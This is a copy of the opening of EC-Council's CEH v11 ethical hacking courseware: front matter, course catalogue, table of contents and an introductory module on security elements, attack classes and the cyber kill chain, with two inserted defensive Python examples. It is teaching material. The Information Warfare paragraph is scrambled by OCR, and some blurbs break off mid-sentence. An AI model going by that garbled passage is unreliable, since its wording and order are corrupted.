Ceh11 Book

Ethical Hacking and Countermeasures
Version 11
EC-Council
Copyright © 2020 by EC-Council. All rights reserved. Except as permitted under the Copyright Act of 1976, no part of this publication may be reproduced or distributed in any form or by any means, or stored in a database or retrieval system, without the prior written permission of the publisher, with the exception that the program listings may be entered, stored, and executed in a computer system, but may not be reproduced for publication without the prior written permission of the publisher, except in the case of brief quotations embodied in critical reviews and certain other noncommercial uses permitted by copyright law. For permission requests, write to EC-Council, addressed "Attention: EC-Council," at the address below:
EC-Council
201 Sun Ave NE
Albuquerque, NM 87109
New Mexico
Information contained in this publication has been obtained by EC-Council from sources believed to be reliable. EC-Council takes reasonable measures to ensure that the content is current and accurate; however, because of the possibility of human or mechanical error, we do not guarantee the accuracy, adequacy, or completeness of any information and are not responsible for any errors or omissions nor for the accuracy of the results obtained from use of such information.
The courseware is a result of extensive research and contributions from subject-matter experts from all over the world. Due credits for all such contributions and references are given in the courseware in the research endnotes.
We are committed to protecting intellectual property rights. If you are a copyright owner (an exclusive licensee or their agent) and you believe that any part of the courseware constitutes an infringement of copyright, or a breach of an agreed license contract, you may notify us at legal@eccouncil.org. In the event of a justified complaint, EC-Council will remove the material in question and make necessary rectifications.
The courseware may contain references to other information resources and security solutions, but such references should not be considered as an endorsement of or recommendation by EC-Council.

Readers are encouraged to report errors, omissions, and inaccuracies to EC-Council at legal@eccouncil.org. If you have any issues, please contact us at support@eccouncil.org.
NOTICE TO THE READER

EC-Council does not warrant or guarantee any of the products, methodologies, or frameworks described herein nor does it perform any independent analysis in connection with any of the product information contained herein. EC-Council does not assume, and expressly disclaims, any obligation to obtain and include information other than that provided to it by the manufacturer. The reader is expressly warned to consider and adopt all safety precautions that might be indicated by the activities described herein and to avoid all potential hazards. By following the instruction contained herein, the reader willingly assumes all risks in connection with such instructions. EC-Council makes no representations or warranties of any kind, including but not limited to the warranties of fitness for particular purpose or merchantability, nor are any such representations implied with respect to the material set forth herein, and EC-Council takes no responsibility with respect to such material. EC-Council shall not be liable for any special, consequential, or exemplary damages resulting, in whole or in part, from the reader's use of or reliance upon this material.
Ethical Hacking and Countermeasures Copyright © by EC-Council
Foreword

Since you are reading this CEH v11 courseware, you most likely realize the importance of information systems security. However, we would like to put forth our motive behind compiling a resource such as this one. You might find yourself asking what sets this course apart from the others out there and what you can gain from this course. The truth is that no single courseware can address all the issues of information security in a detailed manner. Moreover, the rate at which exploits, tools, and methods are discovered by the security community makes it difficult for one program to cover all the necessary facets of information security. This doesn't mean that this course is inadequate in any way, as we have worked to cover all major domains in such a manner that the reader will be able to appreciate the way security has evolved over time as well as gain insight into the fundamental workings relevant to each domain. It is a blend of academic and practical wisdom supplemented with tools that the reader can readily access in order to obtain a hands-on experience. The emphasis throughout the courseware is on gaining practical know-how, which explains the stress on free and accessible tools. You will read about some of the most widespread attacks seen, the popular tools used by attackers, and how attacks have been carried out using ordinary resources.

You may also want to know what to expect once you have completed the material. Any penetration methodology or sequence in this courseware is a resource that you can definitely use. Firewalls, penetration testing, and the other domains you will cover have evolved into critical components of survival. If hacking involves creativity and thinking 'out-of-the-box', then vulnerability testing and security audits will not ensure the security proofing of an organization. To ensure that organizations have adequately protected their information assets, they must adopt the approach of 'defense in depth'. In other words, they must penetrate their networks and assess the security posture for vulnerabilities and exposure.
The Ethical Hacker is an individual who is usually employed with the organization and who can be trusted to undertake an attempt to penetrate networks and/or computer systems using the same methods as a Hacker. Hacking is a felony in some countries. When done by request and under a contract between an Ethical Hacker and an organization, it is legal. The most important point is that an Ethical Hacker has authorization to probe the target.
The CEH Program certifies individuals in the specific network security discipline of Ethical Hacking from a vendor-neutral perspective. The Certified Ethical Hacker certification will fortify the application knowledge of security officers, auditors, security professionals, site administrators, and anyone who is concerned about the integrity of the network infrastructure. A Certified Ethical Hacker is a skilled professional who understands and knows how to look for the weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a malicious hacker.

To achieve the Certified Ethical Hacker Certification, you must pass the CEH exam 312-50. Please visit https://www.eccouncil.org/programs/certified-ethical-hacker-ceh/ for more information.
Course Prerequisites

It is highly recommended that candidates pursuing this course have a fundamental understanding of operating systems, file systems, computer networks, TCP/IP protocols, information security controls, basic network troubleshooting, data leakage, data backup, and risk management.
About EC-Council

The International Council of Electronic Commerce Consultants, better known as EC-Council, was founded in late 2001 to address the need for well-educated and certified information security and e-business practitioners. EC-Council is a global, member-based organization composed of industry and subject matter experts working together to set the standards and raise the bar in information security certification and education.

EC-Council first developed the Certified Ethical Hacker (C|EH) program with the goal of teaching the methodologies, tools, and techniques used by hackers. Leveraging the collective knowledge of hundreds of subject-matter experts, the CEH program has rapidly gained popularity around the world and is now delivered in more than 145 countries by more than 950 authorized training centers. It is considered as the benchmark for many government entities and major corporations around the globe.

EC-Council, through its impressive network of professionals and huge industry following, also developed a range of other leading programs in information security and e-business. EC-Council has certifications that are viewed as the essential certifications needed when standard configuration and security policy courses fall short. Providing a true, hands-on, tactical approach to security, individuals armed with the knowledge disseminated by EC-Council programs are tightening security networks around the world and beating hackers at their own game.

Other EC-Council Programs
Security Awareness: Certified Secure Computer User

The purpose of the CSCU training program is to provide students with
Network Defense: Certified Network Defender

Students enrolled in the Certified Network Defender course will gain an understanding of network defense technologies so that students may understand how networks operate, how automation software behaves, and how to analyze networks and their defense. Students will learn how to protect, detect, and respond to the network attacks as well as learning about network defense fundamentals, the application of network security controls, protocols, perimeter appliances, secure IDS, VPN, and firewall configuration. Students will also learn the intricacies of network traffic signature, analysis, and vulnerability scanning, which will help in designing improved network security policies and successful incident response plans. These skills will help organizations foster resiliency and operational continuity during attacks.
Penetration Testing: Certified Penetration Testing Professional

CPENT certification requires you to demonstrate the application of advanced penetration testing techniques such as advanced Windows attacks, IoT systems attacks, advanced binaries exploitation, exploits writing, bypassing a filtered network, Operational Technology (OT) pen testing, accessing hidden networks with pivoting and double pivoting, privilege escalation, and evading defense mechanisms.

EC-Council's CPENT standardizes the knowledge base for penetration testing professionals by incorporating best practices followed by experienced experts in the field. The objective of the CPENT is to ensure that each professional follows a strict code of ethics, is exposed to the best practices in the domain of penetration testing, and is aware of all the compliance requirements required by the industry.

Unlike a normal security certification, the CPENT credential provides assurance that security professionals possess the skills to analyze the security posture of a network exhaustively and recommend corrective measures authoritatively. For many years EC-Council has been certifying IT Security Professionals around the globe to ensure these professionals are proficient in network security defense mechanisms. EC-Council's credentials vouch for their professionalism and expertise, thereby making these professionals more sought after by organizations and consulting firms globally.
Forensics: Computer Hacking Forensic Investigator

Computer Hacking Forensic Investigator (CHFI) is a comprehensive course covering major forensic investigation scenarios. It enables students to acquire crucial hands-on experience with various forensic investigation techniques. Students learn how to utilize standard forensic tools to successfully carry out a computer forensic investigation, preparing them to better aid in the prosecution of perpetrators.

EC-Council's CHFI certifies individuals in the specific security discipline of computer forensics from a vendor-neutral perspective. The CHFI certification bolsters the applied knowledge of law enforcement personnel, system administrators, security officers, defense and military personnel, legal professionals, bankers, security professionals, and anyone who is concerned about the integrity of network infrastructures.
Incident Handling: EC-Council Certified Incident Handler

The E|CIH program covers how to effectively handle post-breach consequences by reducing the impact of the incident, from both a financial and a reputational perspective.

E|CIH is a method-driven program that uses a holistic approach to cover vast concepts concerning organizational incident handling and response, from preparing and planning the incident handling response process to recovering organizational assets after a security incident. These concepts are essential for handling and responding to security incidents to protect organizations from future threats or attacks.
Certified Chief Information Security Officer

The Certified Chief Information Security Officer (CCISO) program was developed by EC-Council to fill a knowledge gap in the information security industry. Most information security certifications focus on specific tools or practitioner capabilities. When the CCISO program was developed, no certification existed to recognize the knowledge, skills, and aptitudes required for an experienced information security professional to perform the duties of a CISO effectively and competently. In fact, at that time, many questions existed about what a CISO really was and the value this role adds to an organization. The CCISO Body of Knowledge helps to define the role of the CISO and clearly outline the contributions this person makes in an organization. EC-Council enhances this information through training opportunities conducted as instructor-led or self-study modules to ensure candidates have a complete understanding of the role. EC-Council evaluates the knowledge of CCISO candidates with a rigorous exam that tests their competence across five domains with which a seasoned security leader should be familiar.
Application Security: Certified Application Security Engineer

The Certified Application Security Engineer (CASE) credential is developed in collaboration with application and software development experts globally. The CASE credential tests the critical security skills and knowledge required throughout a typical software development lifecycle (SDLC), focusing on the importance of the implementation of secure methodologies and practices in today's insecure operating environment.

The CASE training program is developed concurrently to prepare certified software professionals with the necessary capabilities that are expected by employers and academia globally. It is designed to be a hands-on, comprehensive application security course that will help software professionals create secure applications. The training program encompasses security activities involved in all phases of the Software Development Lifecycle (SDLC): planning, creating, testing, and deploying an application.

Unlike other application security trainings, CASE goes beyond just the guidelines on secure coding practices and includes secure requirement gathering, robust application design, and handling security issues in post-development phases of application development. This makes CASE one of the most comprehensive certifications on the market today. It is desired by software application engineers, analysts, and testers globally, and respected by hiring authorities.
Incident Handling: Certified Threat Intelligence Analyst

Certified Threat Intelligence Analyst (C|TIA) is designed and developed in collaboration with cybersecurity and threat intelligence experts across the globe to help organizations identify and mitigate business risks by converting unknown internal and external threats into known threats. It is a comprehensive, specialist-level program that teaches a structured approach for building effective threat intelligence.

In the ever-changing threat landscape, C|TIA is an essential Threat Intelligence training program for those who deal with cyber threats on a daily basis. Organizations today demand a professional-level cybersecurity threat intelligence analyst who can extract the intelligence from data by implementing various advanced strategies. Such professional-level Threat Intelligence training programs can only be achieved when the core of the curricula maps with and is compliant to government and industry published threat intelligence frameworks.
Incident Handling: Certified SOC Analyst

The Certified SOC Analyst (CSA) program is the first step to joining a security operations center (SOC). It is engineered for current and aspiring Tier I and Tier II SOC analysts to achieve proficiency in performing entry-level and intermediate-level operations. CSA is a training and credentialing program that helps the candidate

Please visit https://cert.eccouncil.org/certified-ethical-hacker.html for more information.
Table of Contents

Module 01: Introduction to Ethical Hacking
    Information Security Overview
    Cyber Kill Chain Concepts
    Hacking Concepts
    Ethical Hacking Concepts
    Information Security Controls
    Information Security Laws and Standards

Module 02: Footprinting and Reconnaissance
    Footprinting Concepts
    Footprinting through Search Engines
    Footprinting through Web Services
    Footprinting through Social Networking Sites
    Website Footprinting
    Email Footprinting
    Whois Footprinting
    DNS Footprinting
    Network Footprinting
    Footprinting through Social Engineering
    Footprinting Tools
    Footprinting Countermeasures

Module 03: Scanning Networks
    Network Scanning Concepts
    Scanning Tools
    Host Discovery
    Port and Service Discovery
    OS Discovery (Banner Grabbing/OS Fingerprinting)
    Scanning Beyond IDS and Firewall
    Draw Network Diagrams

Module 04: Enumeration
    Enumeration Concepts
    NetBIOS Enumeration
    SNMP Enumeration
    LDAP Enumeration
    NTP and NFS Enumeration
    SMTP and DNS Enumeration
    Other Enumeration Techniques
    Enumeration Countermeasures

Module 05: Vulnerability Analysis
    Vulnerability Assessment Concepts
    Vulnerability Classification and Assessment Types
    Vulnerability Assessment Solutions and Tools
    Vulnerability Assessment Reports

Module 06: System Hacking
    System Hacking Concepts
    Gaining Access
    Escalating Privileges
    Maintaining Access
    Clearing Logs

Module 07: Malware Threats
    Malware Concepts
    APT Concepts
    Trojan Concepts
    Virus and Worm Concepts
    Fileless Malware Concepts
    Malware Analysis
    Countermeasures
    Anti-Malware Software

Module 08: Sniffing
    Sniffing Concepts
    Sniffing Technique: MAC Attacks
    Sniffing Technique: DHCP Attacks
    Sniffing Technique: ARP Poisoning
    Sniffing Technique: Spoofing Attacks
    Sniffing Technique: DNS Poisoning
    Sniffing Tools
    Countermeasures
    Sniffing Detection Techniques

Module 09: Social Engineering
    Social Engineering Concepts
    Social Engineering Techniques
    Insider Threats
    Impersonation on Social Networking Sites
    Identity Theft
    Countermeasures

Module 10: Denial-of-Service
    DoS/DDoS Concepts
    DoS/DDoS Attack Techniques
    Botnets
    DDoS Case Study
    DoS/DDoS Attack Tools
    Countermeasures
    DoS/DDoS Protection Tools

Module 11: Session Hijacking
    Session Hijacking Concepts
    Application Level Session Hijacking
    Network Level Session Hijacking
    Session Hijacking Tools
    Countermeasures

Module 12: Evading IDS, Firewalls, and Honeypots
    IDS, IPS, Firewall, and Honeypot Concepts
    IDS, IPS, Firewall, and Honeypot Solutions
    Evading IDS
    Evading Firewalls
    IDS/Firewall Evading Tools
    Detecting Honeypots

Module 13: Hacking Web Servers
    Web Server Concepts
    Web Server Attacks
    Web Server Attack Methodology
    Web Server Attack Tools
    Countermeasures
    Patch Management
    Web Server Security Tools

Module 14: Hacking Web Applications
    Web Application Concepts
    Web Application Threats
    Web Application Hacking Methodology
    Web API, Webhooks, and Web Shell
    Web Application Security

Module 15: SQL Injection
    SQL Injection Concepts
    Types of SQL Injection
    SQL Injection Methodology
    SQL Injection Tools
    Evasion Techniques
    Countermeasures

Module 16: Hacking Wireless Networks
    Wireless Concepts
    Wireless Encryption
    Wireless Threats
    Wireless Hacking Methodology
    Wireless Hacking Tools
    Bluetooth Hacking
    Countermeasures
    Wireless Security Tools

Module 18: IoT and OT Hacking
    IoT Concepts
    IoT Attacks
    IoT Hacking Methodology
    IoT Hacking Tools
    Countermeasures
    OT Concepts
    OT Attacks
    OT Hacking Methodology
    OT Hacking Tools
    Countermeasures

Module 19: Cloud Computing
    Cloud Computing Concepts
    Container Technology
    Serverless Computing
    Cloud Computing Threats
    Cloud Hacking
    Cloud Security

Module 20: Cryptography
    Cryptography Concepts
    Encryption Algorithms
    Cryptography Tools
    Public Key Infrastructure (PKI)
    Email Encryption
    Disk Encryption
    Cryptanalysis
    Countermeasures

Glossary
References
Appendix A - Ethical Hacking Essential Concepts - I
Appendix B - Ethical Hacking Essential Concepts - II
ETHICAL HACKING | Certified Ethical Hacker

Module 01: Introduction to Ethical Hacking
Module Objectives

+ Understanding the Elements of Information Security
+ Overview of Hacking Concepts, Types and Phases
+ Understanding Ethical Hacking Concepts and its Scope
+ Overview of Information Security Acts and Laws
Attackers break into systems for various reasons and purposes. Therefore, it is important to understand how malicious hackers attack and exploit systems and the probable reasons behind those attacks. As Sun Tzu states in the Art of War, "If you know yourself but not the enemy, for every victory gained, you will also suffer a defeat." System administrators and security professionals must guard their infrastructure against exploits by knowing the enemy, the malicious hacker(s), who seeks to use the same infrastructure for illegal activities.

This module starts with an overview of the current security scenario and emerging threat vectors. It provides insight into the different elements of information security. Later, the module discusses hacking and ethical hacking concepts and ends with a brief discussion on information security controls and information security laws and acts.

At the end of this module, you will be able to:

+ Describe the elements of information security
+ Explain information security attacks and information warfare
+ Describe cyber kill chain methodology, TTPs, and IoCs
+ Describe hacking concepts, types, and phases
+ Explain ethical hacking concepts and scope
+ Understand information security controls (defense-in-depth, risk management, cyber threat intelligence, threat modeling, incident management process, and AI/ML)
+ Know about the information security acts and laws
Module Flow

Information Security Overview
Information security refers to the protection or safeguarding of information and information systems that use, store, and transmit information from unauthorized access, disclosure, alteration, and destruction. Information is a critical asset that organizations must secure. If sensitive information falls into the wrong hands, then the respective organization may suffer huge losses in terms of finances, brand reputation, customers, or in other ways. To provide an understanding of how to secure such critical information resources, this module starts with an overview of information security.

This section introduces the elements of information security, classification of attacks, and information warfare.
Elements of Information Security

Information security is "the state of the well-being of information and infrastructure in which the possibility of theft, tampering, or disruption of information and services is kept low or tolerable." It relies on five major elements: confidentiality, integrity, availability, authenticity, and non-repudiation.

Confidentiality

Confidentiality is the assurance that the information is accessible only to those authorized. Confidentiality breaches may occur due to improper data handling or a hacking attempt. Confidentiality controls include data classification, data encryption, and proper disposal of equipment (such as DVDs, USB drives, and Blu-ray discs).

Integrity

Integrity is the trustworthiness of data or resources in the prevention of improper and unauthorized changes, that is, the assurance that information is sufficiently accurate for its purpose. Measures to maintain data integrity may include a checksum (a number produced by a mathematical function to verify that a given block of data is not changed) and access control (which ensures that only authorized people can update, add, or delete data).

Availability

Availability is the assurance that the systems responsible for delivering, storing, and processing information are accessible when required by authorized users. Measures to maintain data availability can include disk arrays for redundant systems and clustered machines, antivirus software to combat malware, and distributed denial-of-service (DDoS) prevention systems.
Authenticity

Authenticity refers to the characteristic of communication, documents, or any data that ensures the quality of being genuine or uncorrupted. The major role of authentication is to confirm that a user is genuine. Controls such as biometrics, smart cards, and digital certificates ensure the authenticity of data, transactions, communications, and documents.

Non-Repudiation

Non-repudiation is a way to guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message. Individuals and organizations use digital signatures to ensure non-repudiation.
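As an added example (not part of the CEH courseware), the Python script below shows the difference between the two integrity and authenticity controls named above: an unkeyed checksum, which detects accidental or casual modification of a block of data, and a keyed message authentication code (HMAC), which additionally ties the check value to a secret so that a party without the key cannot produce a valid one. The sample record, the keys and the function names are all constructed for this demonstration.

```python
"""
Added example (not from the CEH courseware): integrity and authenticity checks.

A plain checksum detects that data changed, but anyone who can modify the data
can also recompute the checksum. A keyed MAC (HMAC) binds the check value to a
secret, so a party without the key cannot forge a tag for modified data.
All data and keys below are constructed for this demonstration.
"""
import hashlib
import hmac
import secrets


def checksum(data: bytes) -> str:
    """Unkeyed integrity check: SHA-256 hex digest of the data."""
    return hashlib.sha256(data).hexdigest()


def verify_checksum(data: bytes, expected: str) -> bool:
    """True if the data still matches the stored checksum."""
    return hmac.compare_digest(checksum(data), expected)


def mac_tag(key: bytes, data: bytes) -> str:
    """Keyed integrity and authenticity check: HMAC-SHA256 hex tag."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify_mac(key: bytes, data: bytes, tag: str) -> bool:
    """True if the tag was produced over this data with this key."""
    # compare_digest runs in constant time, so a verifier does not leak
    # how many leading bytes of a guessed tag were correct.
    return hmac.compare_digest(mac_tag(key, data), tag)


def demonstrate() -> dict:
    """Run the tamper scenarios and return each outcome as a named boolean."""
    original = b"PAY 100.00 TO ACCOUNT 12345"   # constructed sample record
    tampered = b"PAY 999.00 TO ACCOUNT 12345"   # same record after modification
    key = secrets.token_bytes(32)               # shared secret, distributed out of band in practice

    stored_sum = checksum(original)
    stored_tag = mac_tag(key, original)

    return {
        # 1. unmodified data passes both checks
        "intact_checksum_ok": verify_checksum(original, stored_sum),
        "intact_mac_ok": verify_mac(key, original, stored_tag),
        # 2. a modification is caught by both, as long as the stored check value is untouched
        "tamper_checksum_detected": not verify_checksum(tampered, stored_sum),
        "tamper_mac_detected": not verify_mac(key, tampered, stored_tag),
        # 3. whoever can rewrite the data can also rewrite an unkeyed checksum...
        "forged_checksum_accepted": verify_checksum(tampered, checksum(tampered)),
        # 4. ...but cannot produce a tag that verifies under the real key
        "forged_mac_rejected": not verify_mac(key, tampered, mac_tag(b"wrong-key", tampered)),
    }


if __name__ == "__main__":
    for name, outcome in demonstrate().items():
        print(f"{name:26s} {outcome}")
```

Note what the keyed tag does not give: because the HMAC key is shared between sender and receiver, either side could have produced the tag, so it cannot settle a later dispute about who sent the message. That is why the text pairs non-repudiation with digital signatures, which are made with a private key only the signer holds.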
Motives, Goals, and Objectives of Information Security Attacks
Attackers generally have motives (goals), and objectives behind their information security attacks. A motive originates out of the notion that a target system stores or processes something valuable, which leads to the threat of an attack on the system. The purpose of the attack may be to disrupt the target organization's business operations, to steal valuable information for the sake of curiosity, or even to exact revenge. Therefore, these motives or goals depend on the attacker's state of mind, their reason for carrying out such an activity, as well as their resources and capabilities. Once the attacker determines their goal, they can employ various tools, attack techniques, and methods to exploit vulnerabilities in a computer system or security policy and controls.

Attacks = Motive (Goal) + Method + Vulnerability

Motives behind information security attacks:

+ Disrupt business continuity
+ Perform information theft
+ Manipulating data
+ Create fear and chaos by disrupting critical infrastructures
+ Bring financial loss to the target
+ Propagate religious or political beliefs
+ Achieve a state's military objectives
+ Damage the reputation of the target
+ Take revenge
+ Demand ransom
Classification of Attacks
According to IATF, security attacks are classified into five categories: passive, active, close-in, insider, and distribution.

Passive Attacks

Passive attacks involve intercepting and monitoring network traffic and data flow on the target network and do not tamper with the data. Attackers perform reconnaissance on network activities using sniffers. These attacks are very difficult to detect as the attacker has no active interaction with the target system or network.

Examples of passive attacks:

o Sniffing and eavesdropping
o Network traffic analysis
o Decryption of weakly encrypted traffic
Active Attacks

Active attacks tamper with the data in transit or disrupt communication or services between the systems to bypass or break into secured systems. Attackers launch attacks on the target system or network by actively sending traffic that can be detected. These attacks are performed on the target network to exploit the information in transit. They penetrate or infect the target's internal network and gain access to a remote system to compromise the internal network.

Examples of active attacks:

o Denial-of-service (DoS) attack
o Bypassing protection mechanisms
o Malware attacks (such as viruses, worms, ransomware)
o Modification of information
o Spoofing attacks
o Replay attacks
o Password-based attacks
o Session hijacking
o Man-in-the-Middle attack
o DNS and ARP poisoning
o Compromised-key attack
o Firewall and IDS attack
o Profiling
o Arbitrary code execution
o Privilege escalation
o Backdoor access
o Cryptography attacks
o SQL injection
o XSS attacks
o Directory traversal attacks
o Exploitation of application and OS software
Close-in Attacks

Close-in attacks are performed when the attacker is in close physical proximity with the target system or network. The main goal of performing this type of attack is to gather or modify information or disrupt its access. For example, an attacker might shoulder surf user credentials. Attackers gain close proximity through surreptitious entry, open access, or both.

Examples of close-in attacks:

o Social engineering (Eavesdropping, shoulder surfing, dumpster diving, and other methods)

Insider Attacks

Insider attacks are performed by trusted persons who have physical access to the critical assets of the target. An insider attack involves using privileged access to violate rules or intentionally cause a threat to the organization's information or information systems. Insiders can easily bypass security rules, corrupt valuable resources, and access sensitive information. They misuse the organization's assets to directly affect the confidentiality, integrity, and availability of information systems. These attacks impact the organization's business operations, reputation, and profit. It is difficult to figure out an insider attack.

Examples of insider attacks:

o Eavesdropping and wiretapping
o Theft of physical devices
o Social engineering
o Data theft and spoliation
o Pod slurping
o Planting keyloggers, backdoors, or malware

Distribution Attacks

Distribution attacks occur when attackers tamper with hardware or software prior to installation. Attackers tamper the hardware or software at its source or when it is in transit. Examples of distribution attacks include backdoors created by software or hardware vendors at the time of manufacture. Attackers leverage these backdoors to gain unauthorized access to the target information, systems, or network.

o Modification of software or hardware during production
o Modification of software or hardware during distribution
InformationWarfare
Source:http://www.iwar.org.uk
‘The
term informationwarfareor InfoWarrefersto the use of informationandcommunication
technologies
(ICT)for competitiveadvantages
over an of information
opponent.Examples
warfare weapons include viruses, worms, Trojan horses, logicbombs,trap doors,
nanomachines andmicrobes,
electronic
jamming,andpenetration
Martin Libickidividedinformationwarfareinto the following
andtools.
exploits
categories
- Command and control warfare (C2 warfare): In the computer security industry, C2 warfare refers to the impact an attacker possesses over a compromised system or network that they control.
- Intelligence-based warfare: Intelligence-based warfare is a sensor-based technology that directly corrupts technological systems. According to Libicki, "intelligence-based warfare" is warfare that consists of the design, protection, and denial of systems that seek sufficient knowledge to dominate the battlespace.
- Electronic warfare: According to Libicki, electronic warfare uses radio-electronic and cryptographic techniques to degrade communication. Radio-electronic techniques attack the physical means of sending information, whereas cryptographic techniques use bits and bytes to disrupt the means of sending information.
- Psychological warfare: Psychological warfare is the use of various techniques such as propaganda and terror to demoralize one's adversary in an attempt to succeed in battle.
- Hacker warfare: According to Libicki, the purpose of this type of warfare can vary from the shutdown of systems, data errors, theft of information, theft of services, system monitoring, false messaging, and access to data. Hackers generally use viruses, logic bombs, Trojan horses, and sniffers to perform these attacks.
- Economic warfare: Libicki notes that economic information warfare can affect the economy of a business or nation by blocking the flow of information. This could be especially devastating to organizations that do a lot of business in the digital world.
- Cyberwarfare: Libicki defines cyber warfare as the use of information systems against the virtual personas of individuals or groups. It is the broadest of all information warfare. It includes information terrorism, semantic attacks (similar to Hacker warfare, but instead of harming a system, it takes over the system while maintaining the perception that it is operating correctly), and simula-warfare (simulated war, for example, acquiring weapons for mere demonstration rather than actual use).
Each form of information warfare mentioned above consists of both defensive and offensive strategies.
- Defensive Information Warfare: Involves all strategies and actions to defend against attacks on ICT assets.
- Offensive Information Warfare: Involves attacks against the ICT assets of an opponent.

Figure 1.2: Block Diagram of Information Warfare
Cyber Kill Chain Methodology

The cyber kill chain methodology is a component of intelligence-driven defense for the identification and prevention of malicious intrusion activities. This methodology helps security professionals in identifying the steps that adversaries follow in order to accomplish their goals.

The cyber kill chain is a framework developed for securing cyberspace based on the concept of military kill chains. This method aims to actively enhance intrusion detection and response. The cyber kill chain is equipped with a seven-phase protection mechanism to mitigate and reduce cyber threats.

According to Lockheed Martin, cyber attacks might occur in seven different phases, from reconnaissance to the final accomplishment of the objective. An understanding of the cyber kill chain methodology helps security professionals to leverage security controls at different stages of an attack and helps them to prevent the attack before it succeeds. It also provides greater insight into the attack phases, which helps in understanding the adversary's TTPs beforehand.
Discussed below are the various phases included in the cyber kill chain methodology:

Reconnaissance

An adversary performs reconnaissance to collect as much information about the target as possible to probe for weak points before actually attacking. They look for information such as publicly available information on the Internet, network information, system information, and the organizational information of the target. By conducting reconnaissance across different network levels, the adversary can gain information such as network blocks, specific IP addresses, and employee details. The adversary may use automated tools to obtain information such as open ports and services, vulnerabilities in applications, and login credentials. Such information can help the adversary in gaining backdoor access to the target network.

Activities of the adversary include the following:
- Gathering information about the target organization by searching the Internet or through social engineering
- Performing analysis of various online activities and publicly available information
- Gathering information from social networking sites and web services
- Obtaining information about websites visited
- Monitoring and analyzing the target organization's website
- Performing Whois, DNS, and network footprinting
- Performing scanning to identify open ports and services
Weaponization

The adversary analyzes the data collected in the previous stage to identify the vulnerabilities and techniques that can exploit and gain unauthorized access to the target organization. Based on the vulnerabilities identified during analysis, the adversary selects or creates a tailored deliverable malicious payload (remote-access malware weapon) using an exploit and a backdoor to send it to the victim. An adversary may target specific network devices, operating systems, endpoint devices, or even individuals within the organization to carry out their attack. For example, the adversary may send a phishing email to an employee of the target organization, which may include a malicious attachment such as a virus or worm that, when downloaded, installs a backdoor on the system that allows remote access to the adversary.

The following are the activities of the adversary:
- Identifying an appropriate malware payload based on the analysis
- Creating a new malware payload or selecting, reusing, or modifying the available malware payloads based on the identified vulnerability
- Creating a phishing email campaign
- Leveraging exploit kits and botnets
Delivery

The previous stage included creating a weapon. Its payload is transmitted to the intended victim(s) as an email attachment, via a malicious link on websites, or through a vulnerable web application or USB drive. Delivery is a key stage that measures the effectiveness of the defense strategies implemented by the target organization based on whether the intrusion attempt of the adversary is blocked or not.

The following are the activities of the adversary:
- Sending phishing emails to employees of the target organization
- Distributing USB drives containing malicious payload to employees of the target organization
- Performing attacks such as watering hole on the compromised website
- Implementing various hacking tools against the operating systems, applications, and servers of the target organization
Exploitation

After the weapon is transmitted to the intended victim, exploitation triggers the adversary's malicious code to exploit a vulnerability in the operating system, application, or server on a target system. At this stage, the organization may face threats such as authentication and authorization attacks, arbitrary code execution, physical security threats, and security misconfiguration.

Activities of the adversary include the following:
- Exploiting software or hardware vulnerabilities to gain remote access to the target system
Installation

The adversary downloads and installs more malicious software on the target system to maintain access to the target network for an extended period. They may use the weapon to install a backdoor to gain remote access. After the injection of the malicious code on one target system, the adversary gains the capability to spread the infection to other end systems in the network. Also, the adversary tries to hide the presence of malicious activities from security controls like firewalls using various techniques such as encryption.

The following are the activities of the adversary:
- Downloading and installing malicious software such as backdoors
- Gaining remote access to the target system
- Leveraging various methods to keep the backdoor hidden and running
- Maintaining access to the target system
Command and Control

The adversary creates a command and control channel, which establishes two-way communication between the victim's system and the adversary-controlled server to communicate and pass data back and forth. The adversaries implement techniques such as encryption to hide the presence of such channels. Using this channel, the adversary performs remote exploitation on the target system or network.

The following are the activities of the adversary:
- Establishing a two-way communication channel between the victim's system and the adversary-controlled server
- Leveraging channels such as web traffic, email communication, and DNS messages
- Applying privilege escalation techniques
- Hiding any evidence of compromise using techniques such as encryption
Actions on Objectives

The adversary controls the victim's system from a remote location and finally accomplishes their intended goals. The adversary gains access to confidential data, disrupts the services or network, or destroys the operational capability of the target by gaining access to its network and compromising more systems. Also, the adversary may use this as a launching point to perform other attacks.
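The defensive use of the seven phases is to ask, for each host, how far along the chain the evidence reaches and at which earlier phases a control could have broken it but produced nothing. The following is an added example written for this edition, not EC-Council's code: the alert names, the mapping from alert type to kill chain phase, the host names and the timestamps are all constructed assumptions standing in for whatever a SIEM actually emits.

```python
"""Map host-level detections onto the cyber kill chain phases.

Added example (not EC-Council's code). Alert names, hosts and the
alert-to-phase mapping are constructed assumptions.
"""
from collections import defaultdict

# The seven phases of the Lockheed Martin cyber kill chain, in order.
KILL_CHAIN = [
    "Reconnaissance",
    "Weaponization",
    "Delivery",
    "Exploitation",
    "Installation",
    "Command and Control",
    "Actions on Objectives",
]

# Assumed mapping from hypothetical SIEM alert types to the phase they evidence.
ALERT_PHASE = {
    "external_port_scan": "Reconnaissance",
    "phishing_email_blocked": "Delivery",
    "phishing_email_delivered": "Delivery",
    "exploit_attempt": "Exploitation",
    "new_service_installed": "Installation",
    "beacon_to_known_c2": "Command and Control",
    "bulk_outbound_transfer": "Actions on Objectives",
}

def phase_index(phase):
    return KILL_CHAIN.index(phase)

def chain_progress(alerts):
    """Return {host: phases with evidence, in chain order}.

    alerts: iterable of (timestamp, host, alert_name) tuples.
    Unknown alert names are ignored so a noisy feed does not break the mapping.
    """
    seen = defaultdict(set)
    for _ts, host, name in alerts:
        phase = ALERT_PHASE.get(name)
        if phase is not None:
            seen[host].add(phase)
    return {h: sorted(p, key=phase_index) for h, p in seen.items()}

def assess_host(phases):
    """Summarise one host: (deepest phase reached, phases before it with no evidence).

    Each missed phase is a stage where a control could have broken the chain
    but either did not fire or is not instrumented.
    """
    if not phases:
        return None, []
    deepest = max(phases, key=phase_index)
    missed = [p for p in KILL_CHAIN[:phase_index(deepest)] if p not in phases]
    return deepest, missed

def triage(alerts):
    """Rank hosts by how deep into the chain the evidence goes."""
    rows = []
    for host, phases in chain_progress(alerts).items():
        deepest, missed = assess_host(phases)
        rows.append((host, deepest, missed))
    rows.sort(key=lambda r: phase_index(r[1]), reverse=True)
    return rows

# Constructed sample alerts: (ISO timestamp, host, alert type).
SAMPLE_ALERTS = [
    ("2024-01-05T08:02:00Z", "ws-0142", "phishing_email_delivered"),
    ("2024-01-05T08:10:00Z", "ws-0142", "new_service_installed"),
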